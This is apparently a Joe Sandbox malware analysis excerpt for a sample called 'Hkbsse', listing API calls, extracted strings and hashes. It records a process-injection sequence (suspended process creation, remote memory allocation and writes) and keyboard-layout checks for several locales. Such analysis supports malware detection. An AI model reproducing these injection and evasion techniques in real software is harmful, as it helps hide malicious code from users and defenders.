                    • Instruction ID: 03bf1925d7a2e5bd1ee2d27509ab29a4bd1c4a8fcdf0cd60ad602aed4d52dd17
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 04F0963E5007157FDB203BF9A88CF6EB6ECAF49624F140629EA46D54C0DB70E8458A61

                    Control-flow Graph
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,04480223,?,?), ref: 04480E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,04480223,?,?), ref: 04480E1E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: 6da0dfba6629e0b2427a75de31b2c951a5e040edf5eeb36642b56b01bc0074c4
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: A2D0123114512877DB003A94DC09BDE7B1CDF05B62F008011FB0DD9180C770954046E5

                    Control-flow Graph
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9e6d9a063b977dc84b2800641bac0d9326f676cd16d5061fd6fbaf7ab668c9c8
                    • Instruction ID: 6fe4b5f6c01e546057b23e007b78373e331f5fb631c2726a784912e3785aca9d
                    • Opcode Fuzzy Hash: 9e6d9a063b977dc84b2800641bac0d9326f676cd16d5061fd6fbaf7ab668c9c8
                    • Instruction Fuzzy Hash: 6401F937604521AFAB158E69EC44B5B3396EB88760F249122FF10DB254DB74C80197DA

                    Control-flow Graph
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02891F2E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275264775.0000000002891000.00000040.00000020.00020000.00000000.sdmp, Offset: 02891000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_2891000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: cba5a14f3603138e55766592bb89f3c3f524fb5131ab5cbbed152f6d38a50392
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: 4D112B79A00208EFDB01DF98C989E98BBF5EF08350F098094F9489B361D371EA50DF80
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040713D
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040719B
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 004071B4
                    • GetThreadContext.KERNEL32(?,00000000), ref: 004071C9
                    • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 004071E9
                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040722B
                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00407248
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00407301
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                    • String ID: $VUUU$invalid stoi argument
                    • API String ID: 3796053839-3954507777
                    • Opcode ID: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction ID: 366fe4445ccda86ac4365a5b5e7cea4355bbaaae95b1a624cf57fc235f8353fe
                    • Opcode Fuzzy Hash: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction Fuzzy Hash: 85416D75644301BFE7209F50DC06F9A7BE8BF88B15F000429F684E62D1DBB4E954CB9A
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 044873A4
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 04487402
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0448741B
                    • GetThreadContext.KERNEL32(?,00000000), ref: 04487430
                    • ReadProcessMemory.KERNEL32(?,00458E08,?,00000004,00000000), ref: 04487450
                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 04487492
                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 044874AF
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 04487568
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                    • String ID: VUUU
                    • API String ID: 3796053839-2040033107
                    • Opcode ID: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction ID: 0e5641ff5658990f9a1eff28aea56ff99786c9c881e3c6fb2146325cb0068b23
                    • Opcode Fuzzy Hash: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction Fuzzy Hash: 49416D75244300BFE7609F50DC06F5A7BE8BF88B15F500529F688E66D1E7B0E514CB5A
                    APIs
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00421026
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00421072
                      • Part of subcall function 0042276D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00422860
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 004210DE
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 004210FA
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042114E
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042117B
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004211D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                    • String ID: (
                    • API String ID: 2943730970-3887548279
                    • Opcode ID: 8c69f2fc84a741307255bbb0b4330fe48ac673d4345c19986d42afeb624b92f1
                    • Instruction ID: 5a02515ce4d3d9bed4952b7643743e3afd61b43d92e326ff25b08a62267af8db
                    • Opcode Fuzzy Hash: 8c69f2fc84a741307255bbb0b4330fe48ac673d4345c19986d42afeb624b92f1
                    • Instruction Fuzzy Hash: D5B18B70A00626EFCB18CF59E980B7AB7B4FF58300F54816EE901AB751D374AD91CB99
                    APIs
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044A128D
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044A12D9
                      • Part of subcall function 044A29D4: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 044A2AC7
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 044A1345
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044A1361
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044A13B5
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044A13E2
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 044A1438
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                    • String ID: (
                    • API String ID: 2943730970-3887548279
                    • Opcode ID: 8c69f2fc84a741307255bbb0b4330fe48ac673d4345c19986d42afeb624b92f1
                    • Instruction ID: ef7e6e5a82f8a3226a5d9ddc18f4d2c9aadc502bbebb0ca43ea51cad39773dbc
                    • Opcode Fuzzy Hash: 8c69f2fc84a741307255bbb0b4330fe48ac673d4345c19986d42afeb624b92f1
                    • Instruction Fuzzy Hash: 89B18C71A00616AFDF18CF58D981A7AB7B4FF54304F14816ED842AB741D770F9A1CB94
                    APIs
                      • Part of subcall function 00422E0C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422E1F
                    • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00421724
                      • Part of subcall function 00422F1F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00422F49
                      • Part of subcall function 00422F1F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00422FB8
                    • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00421856
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 004218B6
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 004218C2
                    • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 004218FD
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0042191E
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0042192A
                    • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00421933
                    • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0042194B
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                    • String ID:
                    • API String ID: 2508902052-0
                    • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction ID: 6480c2bc822c7efa029262303f0049bf934a4c623cf990800cc46984c91a1313
                    • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction Fuzzy Hash: 4B816B71F00225AFCB18DF69D5C0A6EB7B6FF98304B6542AED405A7711C774AD42CB88
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042ED92
                      • Part of subcall function 0042903F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00429060
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0042EDF8
                    • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0042EE10
                    • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0042EE1D
                      • Part of subcall function 0042E8C0: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E8E8
                      • Part of subcall function 0042E8C0: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E980
                      • Part of subcall function 0042E8C0: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E98A
                      • Part of subcall function 0042E8C0: Concurrency::location::_Assign.LIBCMT ref: 0042E9BE
                      • Part of subcall function 0042E8C0: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E9C6
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                    • String ID:
                    • API String ID: 2363638799-0
                    • Opcode ID: 359cefca154fd1910e9e40920a1d5d2fdc105b942d9e07ab11e460ca5353d7d4
                    • Instruction ID: 5dc5f2011173fc565dcc42a134e2cab6d96b6ac4c2e14078affee907e2800f85
                    • Opcode Fuzzy Hash: 359cefca154fd1910e9e40920a1d5d2fdc105b942d9e07ab11e460ca5353d7d4
                    • Instruction Fuzzy Hash: AC51D131B00224EBCF14DF52D885BAEB771AF44314F5540AAE9027B3D2CB38AE45CBA5
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: iCD$iCD
                    • API String ID: 0-1699611018
                    • Opcode ID: 0d29ead68d850d4231866edc20dac4a9be113f3423a672bfe0a751cb53d019d0
                    • Instruction ID: 3233a7ddcac68cb8f574e6c19afe3b518d5c820d3ffb50c00228bdd3c5303718
                    • Opcode Fuzzy Hash: 0d29ead68d850d4231866edc20dac4a9be113f3423a672bfe0a751cb53d019d0
                    • Instruction Fuzzy Hash: 7DF15071E002199FEF14CFA9C9806AEB7B1FF48714F25826AE815A7344D774AE05CB94
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0041C87E
                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0041C88C
                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0041C89D
                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0041C8AE
                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0041C8BF
                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0041C8D0
                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0041C8E1
                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0041C8F2
                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0041C903
                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0041C914
                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0041C925
                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0041C936
                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0041C947
                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0041C958
                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0041C969
                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0041C97A
                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0041C98B
                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0041C99C
                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0041C9AD
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0041C9BE
                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0041C9CF
                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0041C9E0
                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0041C9F1
                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0041CA02
                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0041CA13
                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0041CA24
                    • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0041CA35
                    • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0041CA46
                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041CA57
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041CA68
                    • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0041CA79
                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0041CA8A
                    • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0041CA9B
                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0041CAAC
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0041CABD
                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0041CACE
                    • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0041CADF
                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0041CAF0
                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0041CB01
                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0041CB12
                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0041CB23
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                    • API String ID: 667068680-295688737
                    • Opcode ID: 33ab0460f6536ff686f2647f824dff4c0f5cd89bd5de9affe1c197909d8f0196
                    • Instruction ID: 0f84095e92aac1c2e0bb15fd21b29d90348e2d41669b35d16af1684e6b0aebcd
                    • Opcode Fuzzy Hash: 33ab0460f6536ff686f2647f824dff4c0f5cd89bd5de9affe1c197909d8f0196
                    • Instruction Fuzzy Hash: 38612875952711EBD7016FB4FC0DF893AB8AA09B53B608537F906D21B2E6F88004CB6D
                    APIs
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041F3CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::invalid_argument::invalid_argument
                    • String ID: pEvents
                    • API String ID: 2141394445-2498624650
                    • Opcode ID: 27236a855b666e4e5bd3eac149ecb22a79a74c6539c6d0daf36335667c8a3df2
                    • Instruction ID: ec5f4af2191e720b375f933e814ac6687ada2e9c436967f06c552350c2c861e3
                    • Opcode Fuzzy Hash: 27236a855b666e4e5bd3eac149ecb22a79a74c6539c6d0daf36335667c8a3df2
                    • Instruction Fuzzy Hash: DE81BE35D00219DBCF14DFA9C981BEEB7B1AF44314F14446BE811A7381DB38AD8ACB59
                    APIs
                    • ListArray.LIBCONCRT ref: 00424648
                      • Part of subcall function 00424429: InitializeSListHead.KERNEL32(?,?,00000000,?,?), ref: 004244F5
                      • Part of subcall function 00424429: InitializeSListHead.KERNEL32(?), ref: 004244FF
                    • ListArray.LIBCONCRT ref: 0042467C
                    • Hash.LIBCMT ref: 004246E5
                    • Hash.LIBCMT ref: 004246F5
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 0042478A
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00424797
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 004247A4
                    • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 004247B1
                      • Part of subcall function 00429D51: std::bad_exception::bad_exception.LIBCMT ref: 00429D73
                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00427B25,?,000000FF,00000000), ref: 00424839
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0042485B
                    • GetLastError.KERNEL32(0042559B,?,?,00000000,?,?), ref: 0042486D
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0042488A
                      • Part of subcall function 0041FCBA: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,0042559B,00000008,?,0042488F,?,00000000,00427B16,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0041FCD2
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004248B4
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
                    • String ID: LB
                    • API String ID: 2750799244-539997225
                    • Opcode ID: 8a4f9a13203044ed445ea91451dfc54ed5abade5e5072e603c62186a7f12c7b2
                    • Instruction ID: ef0eb92deb565825a4515ec48e111432acd83b2f5c02b78017a4afb90a903cfa
                    • Opcode Fuzzy Hash: 8a4f9a13203044ed445ea91451dfc54ed5abade5e5072e603c62186a7f12c7b2
                    • Instruction Fuzzy Hash: 31816EB0B11A62BAD708DF75D845BD9FBA8BF08704F50421FF42897281CBB8A564CBD5
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 044BF6AD
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF263
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF275
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF287
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF299
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF2AB
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF2BD
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF2CF
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF2E1
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF2F3
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF305
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF317
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF329
                      • Part of subcall function 044BF246: _free.LIBCMT ref: 044BF33B
                    • _free.LIBCMT ref: 044BF6A2
                      • Part of subcall function 044BB0FC: HeapFree.KERNEL32(00000000,00000000,?,044BF3D7,?,00000000,?,?,?,044BF3FE,?,00000007,?,?,044BF800,?), ref: 044BB112
                      • Part of subcall function 044BB0FC: GetLastError.KERNEL32(?,?,044BF3D7,?,00000000,?,?,?,044BF3FE,?,00000007,?,?,044BF800,?,?), ref: 044BB124
                    • _free.LIBCMT ref: 044BF6C4
                    • _free.LIBCMT ref: 044BF6D9
                    • _free.LIBCMT ref: 044BF6E4
                    • _free.LIBCMT ref: 044BF706
                    • _free.LIBCMT ref: 044BF719
                    • _free.LIBCMT ref: 044BF727
                    • _free.LIBCMT ref: 044BF732
                    • _free.LIBCMT ref: 044BF76A
                    • _free.LIBCMT ref: 044BF771
                    • _free.LIBCMT ref: 044BF78E
                    • _free.LIBCMT ref: 044BF7A6
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID: 8"F$`'F
                    • API String ID: 161543041-3117062166
                    • Opcode ID: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction ID: c055fb2d48fd13052c0f01661329233a9d13769c596fd26fc21b7cc879b73c83
                    • Opcode Fuzzy Hash: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction Fuzzy Hash: 21313E31600A41EBEF31AA3ADC45BEB77E4EB00354F10846BE8D9D6661DE75B845CBB0
                    APIs
                    • __EH_prolog3.LIBCMT ref: 0449F3A6
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0449F632
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog3std::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 1590901807-0
                    • Opcode ID: 27236a855b666e4e5bd3eac149ecb22a79a74c6539c6d0daf36335667c8a3df2
                    • Instruction ID: c18015e9f2364e49083ddf5a11a201a5595a48496c6f46955ed331679766de48
                    • Opcode Fuzzy Hash: 27236a855b666e4e5bd3eac149ecb22a79a74c6539c6d0daf36335667c8a3df2
                    • Instruction Fuzzy Hash: EE818E31E002189BDF24DFA9C985BAEBBF0AF14314F24405AD801E7382DB74BD4AEB50
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                    • API String ID: 0-3963862150
                    • Opcode ID: 46048c94105e5faabe7612071a4c00acadbdd48ad5745136731e4014b29af49b
                    • Instruction ID: 76edcd2264c5843344100667b3f81de8b4abb57d1d227a43f18c015c8770d745
                    • Opcode Fuzzy Hash: 46048c94105e5faabe7612071a4c00acadbdd48ad5745136731e4014b29af49b
                    • Instruction Fuzzy Hash: 6AF1E37090021CABEB24DF54CD49BDEBBB9EB44304F5041AEE409A72C1DB789AC4CF99
                    APIs
